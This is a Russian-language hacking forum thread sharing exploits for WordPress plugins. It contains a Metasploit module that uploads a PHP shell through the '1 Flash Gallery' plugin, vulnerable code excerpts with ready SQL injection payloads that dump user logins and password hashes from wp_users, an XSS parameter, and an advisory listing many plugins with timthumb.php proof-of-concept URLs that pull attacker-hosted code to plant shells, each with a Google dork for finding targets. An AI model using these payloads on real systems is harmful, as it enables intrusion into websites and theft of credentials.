18.09.2011, 18:17
|
|
Постоянный
Регистрация: 02.11.2009
Сообщений: 341
С нами:
8696259
Репутация:
65
|
|
Wordpress 1 Flash Gallery Plugin Arbiraty File Upload Exploit (MSF)
Сообщение от None
# # Поиск в гугле: inurl:"wp-content/plugins/1-flash-gallery"
require 'msf/core'
class Metasploit3 '1 Flash Gallery Wordpress Plugin File Upload Exploit',
'Description' => %q{
This module exploits an arbitrary file upload vulnerability in
the '1 Flash Gallery' Wordpress plugin.
},
'Author' => [ 'Ben Schmidt'],
'License' => MSF_LICENSE,
'References' => ["http://spareclockcycles.org/2011/09/06/flash-gallery-arbitrary-file-upload/" ],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
# Arbitrary big number. The payload gets sent as an HTTP
# POST request, so it's possible this might be smaller (maybe?)
# but very unlikely.
'Space' => 262144, # 256k
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sept 6, 2011'
))
register_options([
OptString.new('URI', [true, "Path to Wordpress", "/"]),
], self.class)
end
def exploit
boundary = rand_text_alphanumeric(6)
fn = rand_text_alphanumeric(8)
data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filedata\"; "
data datastore['URI'] + "/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify&fileext=php",
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=' + boundary,
'Content-Length' => data.length,
}
}, 25)
if (res)
print_status("Successfully uploaded shell.")
shell_path = res.body.split("_")[0]
print_status("Trying to access shell at #{shell_path}...")
res = send_request_raw({
'uri' => datastore['URI'] + shell_path,
'method' => 'GET',
}, 0.01)
else
print_error("Error uploading shell")
end
handler
end
end
|
|
|
27.09.2011, 19:53
|
|
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
С нами:
9157119
Репутация:
74
|
|
Ребят, подскажите, есть ли актуальный сканер плагинов вп, который позволял бы узнать, какие плагины установлены?
|
|
|
|
27.09.2011, 19:58
|
|
Познающий
Регистрация: 03.02.2009
Сообщений: 49
С нами:
9087772
Репутация:
403
|
|
fl00der/thread291666.html
|
|
|
|
29.09.2011, 23:47
|
|
Новичок
Регистрация: 14.08.2005
Сообщений: 1
С нами:
10915352
Репутация:
0
|
|
Подскажите хорошую статью по уснановке WP на IIS 7
|
|
|
|
30.09.2011, 19:08
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
easy-color-manager #plugin# shell upload
easy-color-manager.php
PHP код:
[COLOR="#000000"]...
[COLOR="#0000BB"]
[/COLOR]
[COLOR="#0000BB"][/COLOR]
[COLOR="#0000BB"][/COLOR]
[COLOR="#0000BB"][/COLOR][COLOR="#0000BB"]background_part_array[/COLOR][COLOR="#007700"]) as[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]){
if([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]background_part_array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'type'[/COLOR][COLOR="#007700"]] ===[/COLOR][COLOR="#DD0000"]'navigation-02'[/COLOR][COLOR="#007700"]){
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]background_part_array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]' 背景'[/COLOR][COLOR="#007700"];
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]background_part_array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]' パネル'[/COLOR][COLOR="#007700"];
} else {
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]background_part_array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]] ;
}
}
[/COLOR][COLOR="#0000BB"]?>
[/COLOR]
[COLOR="#0000BB"]
[/COLOR][/COLOR]" />
表示方法の設定は「背景画像オプション」、削除は「サイトの詳細設定」でおこなってください。
...[/COLOR]
shell:
Код:
http://wp/wp-content/plugins/easycolmanager/uploads/shell.php
glossy #plugin# sql-inj
glossy.admin.addEntry.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$entryName[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gs_entry_name'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$entryTitle[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gs_entry_title'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$entryLink[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gs_entry_link'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$entryDimensions[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gs_entry_dimensions'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$entryContents[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gs_entry_contents'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$saveEntry[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]gs_save_entry[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$entryName[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$entryTitle[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$entryLink[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$entryDimensions[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$entryContents[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$pageAction[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$entryOriginalName[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]// If $saveEntry is empty (no errors) and we've been adding, switch to editing mode
[/COLOR][COLOR="#007700"]if (empty([/COLOR][COLOR="#0000BB"]$saveEntry[/COLOR][COLOR="#007700"]))
{
[/COLOR][COLOR="#0000BB"]$completedAction[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$pageAction[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$pageAction[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"Edit"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$entryOriginalName[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$entryName[/COLOR][COLOR="#007700"];
}
...[/COLOR][/COLOR]
glossy.admin.addEntry.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
} else if ([/COLOR][COLOR="#0000BB"]$entryAction[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"Add"[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]$entryName[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]$entryOriginalName[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]prepare[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT gs_name FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$gs_tableName[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" WHERE gs_name = '%s';"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$entryName[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$existingName[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_var[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$existingName[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$saveData[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$errorFields[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'entryName'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]'taken'[/COLOR][COLOR="#007700"];
}
}
...[/COLOR][/COLOR]
exploit:
Код:
POST: wp-content/plugins/glossy/glossy.admin.addEntry.php
data: gs_entry_title=&gs_entry_link=&gs_entry_dimensions=&gs_entry_contents=&gs_entry_name=aaa+union+select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+--+
google-button-wp #plugin# passive XSS
google.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#DD0000"]'.__("General options", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__("Active share buttons", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#DD0000"]';
foreach ($active_buttons as $name => $text) {
$checked = ($option['[/COLOR][COLOR="#0000BB"]active_buttons[/COLOR][COLOR="#DD0000"]'][$name]) ? '[/COLOR][COLOR="#0000BB"]checked[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"checked"' : '';
$out .= '[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'
. __($text, '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]nbsp[/COLOR][COLOR="#007700"];&[/COLOR][COLOR="#0000BB"]nbsp[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#DD0000"]';
}
$out .= '[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__("Show buttons in these pages", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#DD0000"]';
foreach ($show_in as $name => $text) {
$checked = ($option['[/COLOR][COLOR="#0000BB"]show_in[/COLOR][COLOR="#DD0000"]'][$name]) ? '[/COLOR][COLOR="#0000BB"]checked[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"checked"' : '';
$out .= '[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'
. __($text, '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]nbsp[/COLOR][COLOR="#007700"];&[/COLOR][COLOR="#0000BB"]nbsp[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#DD0000"]';
}
$out .= '[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__("Position", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#DD0000"]'.__('[/COLOR][COLOR="#0000BB"]before the post[/COLOR][COLOR="#DD0000"]', '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__('[/COLOR][COLOR="#0000BB"]after the post[/COLOR][COLOR="#DD0000"]', '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__('[/COLOR][COLOR="#0000BB"]before[/COLOR][COLOR="#007700"]and[/COLOR][COLOR="#0000BB"]after the post[/COLOR][COLOR="#DD0000"]', '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__("Google +1 options", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__("Button width", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#0000BB"]px[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__("default: 90", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__("Show counter", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]:
...[/COLOR][/COLOR]
Vurnel input name "px" ex:alert()
polylang #plugin# double sql-inj
languages-form.php
PHP код:
[COLOR="#000000"]...
[COLOR="#0000BB"]
[/COLOR]
[/COLOR][COLOR="#0000BB"]term_id[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]?>[/COLOR]" />[COLOR="#0000BB"]
[/COLOR] [COLOR="#0000BB"][/COLOR]
[COLOR="#0000BB"][/COLOR]
[/COLOR][COLOR="#0000BB"]name[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]?>[/COLOR]" size="40" aria-required="true" />
[COLOR="#0000BB"][/COLOR]
[COLOR="#0000BB"][/COLOR]
[/COLOR][COLOR="#0000BB"]description[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]?>[/COLOR]" size="40" aria-required="true" />
[COLOR="#0000BB"][/COLOR]
[COLOR="#0000BB"][/COLOR]
[/COLOR][COLOR="#0000BB"]slug[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]?>[/COLOR]" size="40" />
[COLOR="#0000BB"][/COLOR]
...[/COLOR]
admin.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]])) {
[/COLOR][COLOR="#FF8000"]// Update links to this language in posts and terms in case the slug has been modified
[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_language[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$old_slug[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]slug[/COLOR][COLOR="#007700"];
if ([/COLOR][COLOR="#0000BB"]$old_slug[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'slug'[/COLOR][COLOR="#007700"]]) {
[/COLOR][COLOR="#FF8000"]// update the language slug in posts meta
[/COLOR][COLOR="#007700"]...[/COLOR][/COLOR]
exploit #1:
Код:
POST: wp-contents/plugins/polylang/admin.php
data: lang=albanskiy&slug=newnew&set=1+union+select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+--+&time=now
uninstall.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$languages[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]get_terms[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'language'[/COLOR][COLOR="#007700"], array([/COLOR][COLOR="#DD0000"]'hide_empty'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]));
foreach ([/COLOR][COLOR="#0000BB"]$languages[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#FF8000"]// delete references to this language in all posts
[/COLOR][COLOR="#0000BB"]$args[/COLOR][COLOR="#007700"]= array([/COLOR][COLOR="#DD0000"]'numberposts'[/COLOR][COLOR="#007700"]=> -[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'post_type'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'any'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'post_status'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'any'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$posts[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]get_posts[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$args[/COLOR][COLOR="#007700"]);
foreach ([/COLOR][COLOR="#0000BB"]$posts[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$post[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]delete_post_meta[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$post[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]ID[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'_lang-'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]slug[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#FF8000"]// delete references to this language in categories & post tags
[/COLOR][COLOR="#0000BB"]$terms[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]get_terms[/COLOR][COLOR="#007700"](array([/COLOR][COLOR="#DD0000"]'category'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'post_tag'[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]'get=all'[/COLOR][COLOR="#007700"]);
foreach ([/COLOR][COLOR="#0000BB"]$terms[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$term[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]delete_metadata[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'term'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$term[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]term_id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'_language'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]delete_metadata[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'term'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$term[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]term_id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'_lang-'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]slug[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#FF8000"]// finally delete the language itself
[/COLOR][COLOR="#0000BB"]wp_delete_term[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]term_id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'language'[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#FF8000"]// delete the termmeta table only if it is empty as other plugins may use it
[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]termmeta[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$count[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_var[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT COUNT(*) FROM[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#DD0000"]WHERE poly_id=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id']"[/COLOR][COLOR="#007700"]);
if (![/COLOR][COLOR="#0000BB"]$count[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"DROP TABLE[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#DD0000"];"[/COLOR][COLOR="#007700"]);
unset([/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]termmeta[/COLOR][COLOR="#007700"]);
}
...[/COLOR][/COLOR]
exploit #2:
Код:
http://wp/wp-contents/plugins/polylang/uninstall.php?id=-666666666+union+select+1,2,3,4,5,group_concat(user_login,0x3a,user_pass+separator+0x3c62723e)+from+wp_users+--
|
|
|
|
13.10.2011, 20:37
|
|
Новичок
Регистрация: 19.05.2011
Сообщений: 26
С нами:
7886486
Репутация:
-1
|
|
Код:
# Exploit Title: Multiple Wordpress timthumb.php reuse vulnerabilities
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
---
Description
---
The following Wordpress plugins reuse a vulnerable version of the timthumb.php library.
By hosting a malicious GIF file with PHP code appended to the end on an attacker controlled
domain such as blogger.com.evil.com and then providing it to the script through the
src GET parameter, it is possible to upload a shell and execute arbitrary code on the webserver.
Reference: http://www.exploit-db.com/exploits/17602/
# Plugin: Category Grid View Gallery Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/category-grid-view-gallery
# Software Link: http://wordpress.org/extend/plugins/category-grid-view-gallery/download/
# Version: 0.1.1
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/category-grid-view-gallery/includes/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/category-grid-view-gallery/cache/externel_md5(src).php
# Plugin: Auto Attachments Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/auto-attachments
# Software Link: http://wordpress.org/extend/plugins/auto-attachments/download/
# Version: 0.2.9
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/auto-attachments/thumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/auto-attachments/cache/external_md5(src).php
# Plugin: WP Marketplace Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/wp-marketplace
# Software Link: http://wordpress.org/extend/plugins/wp-marketplace/download/
# Version: 1.1.0
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/wp-marketplace/libs/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/wp-marketplace/libs/cache/external_md5(src).php
# Plugin: DP Thumbnail Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/dp-thumbnail
# Software Link: http://wordpress.org/extend/plugins/dp-thumbnail/download/
# Version: 1.0
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/dp-thumbnail/timthumb/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/dp-thumbnail/timthumb/cache/external_md5(src).php
# Plugin: Vk Gallery Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/vk-gallery
# Software Link: http://wordpress.org/extend/plugins/vk-gallery/download/
# Version: 1.1.0
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/vk-gallery/lib/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/vk-gallery/lib/cache/md5(src).php
# Plugin: Rekt Slideshow Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/rekt-slideshow
# Software Link: http://wordpress.org/extend/plugins/rekt-slideshow/download/
# Version: 1.0.5
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/rekt-slideshow/picsize.php?src=MALICIOUS_URL
Must first base64 encode the URL.
The uploaded shell can be found at /wp-content/plugins/rekt-slideshow/cache/md5(src).php
# Plugin: CAC Featured Content Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/cac-featured-content
# Software Link: http://wordpress.org/extend/plugins/cac-featured-content/download/
# Version: 0.8
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/cac-featured-content/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/cac-featured-content/temp/md5(src).php
# Plugin: Rent A Car Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/rent-a-car
# Software Link: http://wordpress.org/extend/plugins/rent-a-car/download/
# Version: 1.0
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/rent-a-car/libs/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/rent-a-car/libs/cache/external_md5(src).php
# Plugin: LISL Last Image Slider Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/lisl-last-image-slider
# Software Link: http://wordpress.org/extend/plugins/lisl-last-image-slider/download/
# Version: 1.0
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/lisl-last-image-slider/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/lisl-last-image-slider/cache/external_md5(src).php
# Plugin: Islidex Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/islidex
# Software Link: http://wordpress.org/extend/plugins/islidex/download/
# Version: 2.7
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/islidex/js/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/islidex/js/cache/md5(src).php
# Plugin: Kino Gallery Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/kino-gallery
# Software Link: http://wordpress.org/extend/plugins/kino-gallery/download/
# Version: 1.0
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/kino-gallery/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/kino-gallery/cache/external_md5(src).php
# Plugin: Cms Pack Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/cms-pack
# Software Link: http://wordpress.org/extend/plugins/cms-pack/download/
# Version: 1.3
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/cms-pack/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/uploads/cms-pack-cache/external_md5(src).php
# Plugin: A Gallery Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/a-gallery
# Software Link: http://wordpress.org/extend/plugins/a-gallery/download/
# Version: 0.9
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/a-gallery/timthumb.php?src=MALICIOUS_URL
